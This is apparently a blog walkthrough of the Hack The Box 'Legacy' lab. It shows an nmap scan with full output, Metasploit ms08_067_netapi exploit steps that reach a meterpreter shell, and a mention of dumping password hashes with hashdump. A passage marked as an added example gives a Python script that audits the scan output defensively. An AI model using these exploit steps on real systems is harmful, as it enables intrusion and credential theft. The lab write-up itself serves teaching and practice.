[Hack-The-Box] ~ Legacy Walkthrough

Dervish
Jun 29, 2021

Legacy is a basic machine on [HTB]. I started with enumeration and scanning.

I used nmap to find all open ports with the command below:

┌──(root💀kali)-[/home/kali]
└─# nmap -A -T4 -p- 10.10.10.4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 15:33 EDT
Nmap scan report for 10.10.10.4
Host is up (0.14s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server

Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (89%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h28m01s, deviation: 2h07m16s, median: -5h58m01s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:20:6e (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-06-28T19:37:35+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 142.30 ms 10.10.14.1
2 142.36 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.63 seconds
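
Read defensively, the scan output above already contains the findings that matter for hardening this host. The following is an added example, not part of the original post: a small Python check that pulls those findings out of nmap's normal-format output. The sample text is constructed from the scan lines above, and the `EOL_OS` list and the wording of the findings are assumptions.

```python
import re

# Constructed sample: the relevant lines of the scan output above.
SAMPLE = """\
Nmap scan report for 10.10.10.4
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# Assumption: OS names this check treats as end-of-life.
EOL_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)
OS_RE = re.compile(r"^\|\s+OS:\s+(.+)$", re.M)  # skips the "OS CPE:" line


def audit_scan(text):
    """Return (host, findings) for one host's nmap normal-format output."""
    host = HOST_RE.search(text)
    findings = []
    # Only ports in state "open" count; closed/filtered ones are ignored.
    open_ports = {int(port) for port, _svc in PORT_RE.findall(text)}
    smb_ports = sorted(open_ports & {139, 445})
    if smb_ports:
        findings.append(f"SMB/NetBIOS reachable on tcp {smb_ports}")
    os_line = OS_RE.search(text)
    if os_line and any(name in os_line.group(1) for name in EOL_OS):
        findings.append(f"end-of-life OS reported: {os_line.group(1).strip()}")
    if re.search(r"message_signing:\s+disabled", text):
        findings.append("SMB message signing disabled")
    if re.search(r"smb2-time: Protocol negotiation failed", text):
        findings.append("SMB2 negotiation failed: host likely speaks SMBv1 only")
    return (host.group(1) if host else None), findings


if __name__ == "__main__":
    host, findings = audit_scan(SAMPLE)
    for finding in findings:
        print(f"{host}: {finding}")
```
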

I decided to start with SMB. After a quick Google search for SMB vulnerabilities in Windows XP, I found the Rapid7 website, which has all the details about this vulnerability and how it can be exploited, as follows:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
    ...targets...
msf exploit(ms08_067_netapi) > set TARGET < target-id >
msf exploit(ms08_067_netapi) > show options
    ...show and set options...
msf exploit(ms08_067_netapi) > exploit or run

Hooray! I got a meterpreter session after a lot of tries. Actually, you may sometimes have a hard time creating a meterpreter session in HTB, because the machine may be busy or restarted by other users, etc. After a day I successfully got in.

Meterpreter has a brand-new feature for seeing what you can do with it: the “help” command, where you can find tons of useful and interesting commands. For real pentesting I use the hashdump command to dump user names and password hashes.

Legacy is a very old Windows computer, so some commands may not work properly. To find the flags that HTB requires, we need to search around for the user and root flags.

You may need to know the following commands if, like me, you don’t know Windows commands well:

> dir
> type

I didn’t share the user and root flags here. All you need to do is copy those flags and paste them into the HTB submit flag field.

Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.

Follow me:

Twitter: https://twitter.com/DervishUludag

Dervish

Application Security Engineer | Learning Ethical Hacking | Security+ | CEH